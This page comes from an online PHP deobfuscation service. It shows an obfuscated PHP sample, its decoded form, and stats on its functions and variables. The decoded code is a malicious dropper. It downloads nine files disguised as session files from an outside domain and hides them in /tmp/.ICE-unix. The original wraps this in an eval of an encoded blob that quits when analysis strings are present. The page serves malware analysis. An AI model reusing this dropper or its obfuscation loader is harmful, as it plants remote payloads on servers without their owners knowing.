Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php if (!function_exists("T7FC56270E7A70FA81A5935B72EACBE29")) { function T7FC5627..

Decoded Output download

?><?pHp
$domen = "http://greatmasterplan.com";
$file1 = "sess_577bfb3600a108e1399d1907c99c3864";
$file2 = "sess_jjrbfb3600a108e4299d1907c99c3r42";
$file3 = "sess_655quo3600a108e1399d1907c99c4864";
$file4 = "sess_f57yit3600a108e9375d1907c99c3r57";
$file5 = "sess_z231fb36foa108e4299d1907c99c3rfo";
$file6 = "sess_b642adfo78a108e247807c9rf69c3rt2";
$file7 = "sess_or7x47fop6a108e9375d1907c99c3r57";
$file8 = "sess_42rbfb3600a108e4299d1907c99c3r42";
$file9 = "sess_t1s2adfo32af35108e651298fo4c93p1";

$linky="$domen/ind1/$file1";$saved="/tmp/.ICE-unix/$file1";$from=fopen("$linky","r");$to=fopen("$saved","w");while(!feof($from)){$string=fgets($from,4096);fputs($to,$string);}fclose($to);fclose($from);
$linky="$domen/ind1/$file2";$saved="/tmp/.ICE-unix/$file2";$from=fopen("$linky","r");$to=fopen("$saved","w");while(!feof($from)){$string=fgets($from,4096);fputs($to,$string);}fclose($to);fclose($from);
$linky="$domen/ind1/$file3";$saved="/tmp/.ICE-unix/$file3";$from=fopen("$linky","r");$to=fopen("$saved","w");while(!feof($from)){$string=fgets($from,4096);fputs($to,$string);}fclose($to);fclose($from);
$linky="$domen/ind1/$file4";$saved="/tmp/.ICE-unix/$file4";$from=fopen("$linky","r");$to=fopen("$saved","w");while(!feof($from)){$string=fgets($from,4096);fputs($to,$string);}fclose($to);fclose($from);
$linky="$domen/ind1/$file5";$saved="/tmp/.ICE-unix/$file5";$from=fopen("$linky","r");$to=fopen("$saved","w");while(!feof($from)){$string=fgets($from,4096);fputs($to,$string);}fclose($to);fclose($from);
$linky="$domen/ind1/$file6";$saved="/tmp/.ICE-unix/$file6";$from=fopen("$linky","r");$to=fopen("$saved","w");while(!feof($from)){$string=fgets($from,4096);fputs($to,$string);}fclose($to);fclose($from);
$linky="$domen/ind1/$file7";$saved="/tmp/.ICE-unix/$file7";$from=fopen("$linky","r");$to=fopen("$saved","w");while(!feof($from)){$string=fgets($from,4096);fputs($to,$string);}fclose($to);fclose($from);
$linky="$domen/ind1/$file8";$saved="/tmp/.ICE-unix/$file8";$from=fopen("$linky","r");$to=fopen("$saved","w");while(!feof($from)){$string=fgets($from,4096);fputs($to,$string);}fclose($to);fclose($from);
$linky="$domen/ind1/$file9";$saved="/tmp/.ICE-unix/$file9";$from=fopen("$linky","r");$to=fopen("$saved","w");while(!feof($from)){$string=fgets($from,4096);fputs($to,$string);}fclose($to);fclose($from);

?><?

Did this file decode correctly?

Original Code

<?php  if (!function_exists("T7FC56270E7A70FA81A5935B72EACBE29")) {  function T7FC56270E7A70FA81A5935B72EACBE29($TF186217753C37B9B9F958D906208506E)  {  $TF186217753C37B9B9F958D906208506E = base64_decode($TF186217753C37B9B9F958D906208506E);  $T7FC56270E7A70FA81A5935B72EACBE29 = 0;  $T9D5ED678FE57BCCA610140957AFAB571 = 0;  $T0D61F8370CAD1D412F80B84D143E1257 = 0;  $TF623E75AF30E62BBD73D6DF5B50BB7B5 = (ord($TF186217753C37B9B9F958D906208506E[1]) << 8) + ord($TF186217753C37B9B9F958D906208506E[2]);  $T3A3EA00CFC35332CEDF6E5E9A32E94DA = 3;  $T800618943025315F869E4E1F09471012 = 0;  $TDFCF28D0734569A6A693BC8194DE62BF = 16;  $TC1D9F50F86825A1A2302EC2449C17196 = "";  $TDD7536794B63BF90ECCFD37F9B147D7F = strlen($TF186217753C37B9B9F958D906208506E);  $TFF44570ACA8241914870AFBC310CDB85 = __FILE__;  $TFF44570ACA8241914870AFBC310CDB85 = file_get_contents($TFF44570ACA8241914870AFBC310CDB85);  $TA5F3C6A11B03839D46AF9FB43C97C188 = 0;  preg_match(base64_decode("LyhwcmludHxzcHJpbnR8ZWNobykv"), $TFF44570ACA8241914870AFBC310CDB85, $TA5F3C6A11B03839D46AF9FB43C97C188);  for (;$T3A3EA00CFC35332CEDF6E5E9A32E94DA<$TDD7536794B63BF90ECCFD37F9B147D7F;)  {   if (count($TA5F3C6A11B03839D46AF9FB43C97C188)) exit;   if ($TDFCF28D0734569A6A693BC8194DE62BF == 0)   {   $TF623E75AF30E62BBD73D6DF5B50BB7B5 = (ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]) << 8);   $TF623E75AF30E62BBD73D6DF5B50BB7B5 += ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]);   $TDFCF28D0734569A6A693BC8194DE62BF = 16;   }   if ($TF623E75AF30E62BBD73D6DF5B50BB7B5 & 0x8000)   {   $T7FC56270E7A70FA81A5935B72EACBE29 = (ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]) << 4);   $T7FC56270E7A70FA81A5935B72EACBE29 += (ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA]) >> 4);   if ($T7FC56270E7A70FA81A5935B72EACBE29)   {    $T9D5ED678FE57BCCA610140957AFAB571 = (ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]) & 0x0F) + 3;    for ($T0D61F8370CAD1D412F80B84D143E1257 = 0; $T0D61F8370CAD1D412F80B84D143E1257 < $T9D5ED678FE57BCCA610140957AFAB571; $T0D61F8370CAD1D412F80B84D143E1257++)    $TC1D9F50F86825A1A2302EC2449C17196[$T800618943025315F869E4E1F09471012+$T0D61F8370CAD1D412F80B84D143E1257] = $TC1D9F50F86825A1A2302EC2449C17196[$T800618943025315F869E4E1F09471012-$T7FC56270E7A70FA81A5935B72EACBE29+$T0D61F8370CAD1D412F80B84D143E1257];    $T800618943025315F869E4E1F09471012 += $T9D5ED678FE57BCCA610140957AFAB571;   }   else   {    $T9D5ED678FE57BCCA610140957AFAB571 = (ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]) << 8);    $T9D5ED678FE57BCCA610140957AFAB571 += ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]) + 16;    for ($T0D61F8370CAD1D412F80B84D143E1257 = 0; $T0D61F8370CAD1D412F80B84D143E1257 < $T9D5ED678FE57BCCA610140957AFAB571; $TC1D9F50F86825A1A2302EC2449C17196[$T800618943025315F869E4E1F09471012+$T0D61F8370CAD1D412F80B84D143E1257++] = $TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA]);    $T3A3EA00CFC35332CEDF6E5E9A32E94DA++; $T800618943025315F869E4E1F09471012 += $T9D5ED678FE57BCCA610140957AFAB571;   }   }   else $TC1D9F50F86825A1A2302EC2449C17196[$T800618943025315F869E4E1F09471012++] = $TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++];   $TF623E75AF30E62BBD73D6DF5B50BB7B5 <<= 1;   $TDFCF28D0734569A6A693BC8194DE62BF--;   if ($T3A3EA00CFC35332CEDF6E5E9A32E94DA == $TDD7536794B63BF90ECCFD37F9B147D7F)   {   $TFF44570ACA8241914870AFBC310CDB85 = implode("", $TC1D9F50F86825A1A2302EC2449C17196);   $TFF44570ACA8241914870AFBC310CDB85 = "?".">".$TFF44570ACA8241914870AFBC310CDB85."<"."?";   return $TFF44570ACA8241914870AFBC310CDB85;   }  }  } } eval(T7FC56270E7A70FA81A5935B72EACBE29("QAAAPD9wSHANCiRkb21lbiA9IAAAImh0dHA6Ly9ncmVhdG1hcwAEdGVycGxhbi5jb20iOwKAZmkQAGxlMQKBc2Vzc181NzdiZmIzAAA2MDBhMTA4ZTEzOTlkMTkwAFE3Yzk5YzM4NjQDNjIDNmpqcgM5IoE0MgM5cjQyAzYzAzY2NTVxdW8Gb6gQBmE0Bmk0AzZmNTd5aXQDNjkzNzWKEwmXcjU3BmY1AzZ6MjMxDMFmbwzCCZwoAWZvAzY2AzZiNjQyYWRmbzc4AzIIlDI0NzgPwXJmNg/wcnQMxzcDNm9yAOk3eDQ3Zm9wNgMyCZ8WVTgDNjQyEy/RAhZWEyk5AzZ0MXMJkjMyYWYzNRmxNgAGNTEyOThmbzRjOTNwMQzBHNBsAgJpbmt5PSIf0y9pbmQxLyQeEiIAADskc2F2ZWQ9Ii90bXAvLkkBBENFLXVuaXgB92Zyb209DHBlbhADKCIkBIIiLCJyIik7JHRvAYYEQqQCAYB3AYB3aCOgKCFmZW9mKCQD4SkAASl7JHN0cmluZz1mZ2V0cwFjACIsNDA5Nik7ZnB1ASF0bywCRCkAfzt9ZmNsb3NlKAYQAgAAxASSEzEIMgy/f/9lGEAMvwy3AfEEQQs2BIILMAy/EPABgAy/EJAMvwVB+38Mvw7zDL8NcgMxKQy/GWczGW8ZaQHxBEEMvxfgE1Dc5wGGGW8hGW8ZbxlvbmcMvwy/Jh9sZUGQGW8ZZ//9AfEMvxfgGW8ZbyYfJh8kECYfJh8m0AhxGW8yyDUZb/v+GWkB8QRBF+YmH3A0QhlvGW8yzzLPAkAZbxlvGW9sP/5lNgy/DLkB8Qy/GW8dowGAMs8yzz9/ASA/fxigdH//bxtgP39ML0whXhAIc0wvAfUMvwswJh8mHyYfJh8KsP35Jh8mHw1wCHEmHyYYOBlvGWkB8QRBJh8/f2VkDjD+zxlvGW8YQAVBTC9MLxlvCmEDWN9lOQy/DLkB8Qdx/wAMvwy/DL9lj2WPZY8yzzLKDQo/Pg==")); ?>

Function Calls

ord 634
count 508
strlen 1
implode 1
preg_match 1
base64_decode 2
function_exists 1
file_get_contents 1
T7FC56270E7A70FA81A5935B72EACBE29 1

Variables

$T0D61F8370CAD1D412F80B84D143E1257 13
$T3A3EA00CFC35332CEDF6E5E9A32E94DA 763
$T7FC56270E7A70FA81A5935B72EACBE29 812
$T800618943025315F869E4E1F09471012 2339
$T9D5ED678FE57BCCA610140957AFAB571 13
$TA5F3C6A11B03839D46AF9FB43C97C188 0
$TC1D9F50F86825A1A2302EC2449C17196 <?pHp $domen = "http://greatmasterplan.com"; $file1 = "ses..
$TDD7536794B63BF90ECCFD37F9B147D7F 763
$TDFCF28D0734569A6A693BC8194DE62BF 4
$TF623E75AF30E62BBD73D6DF5B50BB7B5 267386880
$TFF44570ACA8241914870AFBC310CDB85 ?><?pHp $domen = "http://greatmasterplan.com"; $file1 = "s..

Stats

MD5 66ddde436c40d9c0a6cce9a9ec4a515e
Eval Count 1
Decode Time 13511 ms